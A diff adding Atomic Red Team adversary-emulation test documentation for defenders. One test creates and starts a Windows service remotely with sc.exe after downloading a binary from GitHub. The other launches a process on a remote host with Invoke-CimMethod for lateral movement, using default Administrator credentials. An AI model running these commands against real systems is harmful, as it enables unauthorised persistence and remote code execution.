+Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fb4151a2-db33-4f8c-b7f8-78ea8790f961
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_path | Name of the service binary, include path. | path | PathToAtomicsFolder&#92;T1543.003&#92;bin&#92;AtomicService.exe|
+| service_type | Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare | String | Own|
+| startup_type | Service start method. May be boot,system,auto,demand,disabled,delayed-auto | String | auto|
+| service_name | Name of the Service | string | AtomicTestService_CMD|
+| remote_host | Name of the remote endpoint | string | localhost|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+sc.exe \\#{remote_host} start #{service_name}
+```
+
+#### Cleanup Commands:
+```cmd
+sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Service binary must exist on disk at specified location (#{binary_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+```
+
+
+
+
 <br/>
@@ -14,6 +14,8 @@ Since the execution can be proxied by an account with higher permissions, such a

 - [Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)](#atomic-test-3---hkcu---persistence-using-commandprocessor-autorun-key-without-elevation)

+- [Atomic Test #4 - WMI Invoke-CimMethod Start Process](#atomic-test-4---wmi-invoke-cimmethod-start-process)
+

 <br/>

@@ -142,4 +144,65 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "Au



+<br/>
+<br/>
+
+## Atomic Test #4 - WMI Invoke-CimMethod Start Process
+The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+This is a novel way to perform lateral movement or to start a remote process.
+This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** adae83d3-0df6-45e7-b2c3-575f91584577
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dest | destination computer name | string | localhost|
+| password | password for account | string | P@ssword1|
+| username | account to use | string | Administrator|
+| process | process to spawn | string | calc.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Set the remote computer name and credentials
+ $RemoteComputer = "#{dest}"
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+
+ # Create a CIM session
+ $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential
+
+ # Define the process you want to start
+ $ProcessToStart = "#{process}"
+
+ # Invoke the Create method on the Win32_Process class to start the process
+ $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
+
+ # Check the result
+ if ($Result.ReturnValue -eq 0) {
+     Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
+ } else {
+     Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
+ }
+
+ # Clean up the CIM session
+ Remove-CimSession -CimSession $CimSession
+```
+
+
+
+
+
+
 <br/>